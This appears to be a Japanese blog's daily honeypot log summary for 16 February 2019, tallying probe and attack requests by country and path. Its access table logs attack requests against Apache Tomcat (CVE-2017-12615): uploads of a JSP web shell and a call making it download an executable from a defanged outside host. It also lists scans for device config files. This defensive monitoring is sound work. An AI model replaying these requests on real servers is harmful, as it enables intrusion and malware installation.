ハニーポット観察日記(2019/02/16)
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/02/16 (土) 00:00~23:59 UTC(運用44日目)に取得したログの簡易分析です。
特徴
- Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃を初めて観測しました。
- Axis Communications製品の探査を初めて観測しました。
- 2019/02/13以来、3日ぶりにCisco SPA122のコンフィグファイルの探査を観測しました。
- 7日連続でZGrabによるスキャンを観測しました。
概況
- 集計期間 : 2019/02/16 (土) 00:00~23:59 UTC
- 総アクセス件数 : 43 件(前日比 +14 件)
- トップページへのアクセス : 23 件
- Cisco SPA122のコンフィグファイルの探査 : 9 件
- Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃(参照) : 3 件
- ファビコンの探査 : 2 件
- phpMyAdminの探査 : 2 件
- Axis Communications製品の探査 : 1 件
- robots.txtの探査 : 1 件
- SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 : 1 件
- サイトマップの探査 : 1 件
- ユニークIPアドレス件数 : 28 件 (前日比 +2 件)
- アクセス元の国数 : 21 カ国 (前日比 +4 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
| 順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
|---|---|---|---|---|---|---|
| 1. | Estonia | 10 | - | 0 | +10 | - |
| 2. | Netherlands | 5 | 9. | 1 | +4 | - |
| 3. | Brazil | 3 | 7. | 2 | +1 | - |
| 4. | United States | 3 | 2. | 3 | +-0 | - |
| 5. | China | 3 | 3. | 3 | +-0 | - |
| 6. | Cambodia | 2 | - | 0 | +2 | - |
| 7. | Russia | 2 | 5. | 2 | +-0 | - |
| 8. | Vietnam | 2 | - | 0 | +2 | - |
| 9. | Iceland | 1 | - | 0 | +1 | - |
| 10. | Italy | 1 | - | 0 | +1 | - |
| 11. | India | 1 | 8. | 1 | +-0 | - |
| 12. | Australia | 1 | - | 0 | +1 | - |
| 13. | Iraq | 1 | - | 0 | +1 | - |
| 14. | Germany | 1 | - | 0 | +1 | - |
| 15. | United Kingdom | 1 | - | 0 | +1 | - |
| 16. | Latvia | 1 | - | 0 | +1 | - |
| 17. | Ireland | 1 | - | 0 | +1 | - |
| 18. | Hashemite Kingdom of Jordan | 1 | - | 0 | +1 | - |
| 19. | Uruguay | 1 | - | 0 | +1 | - |
| 20. | Indonesia | 1 | 6. | 2 | -1 | - |
| 21. | France | 1 | - | 0 | +1 | - |
アクセス先
- Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃を初めて観測しました。
- Axis Communications製品の探査を初めて観測しました。
- 2019/02/13以来、3日ぶりにCisco SPA122のコンフィグファイルの探査を観測しました。
- 送信元IPアドレスは、前回の探査と同じものでした。
- 7日連続でZGrabによるスキャンを観測しました。
- 件数は2件でした。
- User-Agentは全て
Mozilla/5.0 zgrab/0.xでした。
アクセス先一覧
アクセス先の一覧は以下の通りです。
| 順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
|---|---|---|---|---|---|---|
| 1. | トップページへのアクセス | GET / HTTP/1.1 | 14 | 1. | 22 | -8 |
| 2. | トップページへのアクセス | GET / HTTP/1.0 | 9 | 2. | 3 | +6 |
| 3. | phpMyAdminの探査 | GET /mysql/admin/index.php?lang=en HTTP/1.1 | 2 | - | 0 | +2 |
| 4. | ファビコンの探査 | GET /favicon.ico HTTP/1.1 | 2 | - | 0 | +2 |
| 5. | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃(参照) | PUT /FxCodeShell.jsp%20 HTTP/1.1 | 1 | - | 0 | +1 |
| 6. | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃(参照) | PUT /FxCodeShell.jsp::$DATA HTTP/1.1 | 1 | - | 0 | +1 |
| 7. | Apache Tomcatの脆弱性(CVE-2017-12615)を利用した攻撃(参照) | GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=hxxp://a46[.]bulehero[.]in/download[.]exe HTTP/1.1 | 1 | - | 0 | +1 |
| 8. | Axis Communications製品の探査 | GET /axis-cgi/jpg/image.cgi HTTP/1.1 | 1 | - | 0 | +1 |
| 9. | robots.txtの探査 | GET /robots.txt HTTP/1.1 | 1 | - | 0 | +1 |
| 10. | サイトマップの探査 | GET /sitemap.xml HTTP/1.1 | 1 | - | 0 | +1 |
| 11. | SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 | GET /.well-known/security.txt HTTP/1.1 | 1 | - | 0 | +1 |
| 12. | Cisco SPA122のコンフィグファイルの探査 | GET /spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 13. | Cisco SPA122のコンフィグファイルの探査 | GET /provision/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 14. | Cisco SPA122のコンフィグファイルの探査 | GET /spa/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 15. | Cisco SPA122のコンフィグファイルの探査 | GET /provisionining/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 16. | Cisco SPA122のコンフィグファイルの探査 | GET /cfg/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 17. | Cisco SPA122のコンフィグファイルの探査 | GET /cisco/spa/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 18. | Cisco SPA122のコンフィグファイルの探査 | GET /cisco/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 19. | Cisco SPA122のコンフィグファイルの探査 | GET /prov/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
| 20. | Cisco SPA122のコンフィグファイルの探査 | GET /linksys/spa122.cfg HTTP/1.1 | 1 | - | 0 | +1 |
WOWHoneypotで取得したログの簡易分析は以上です。
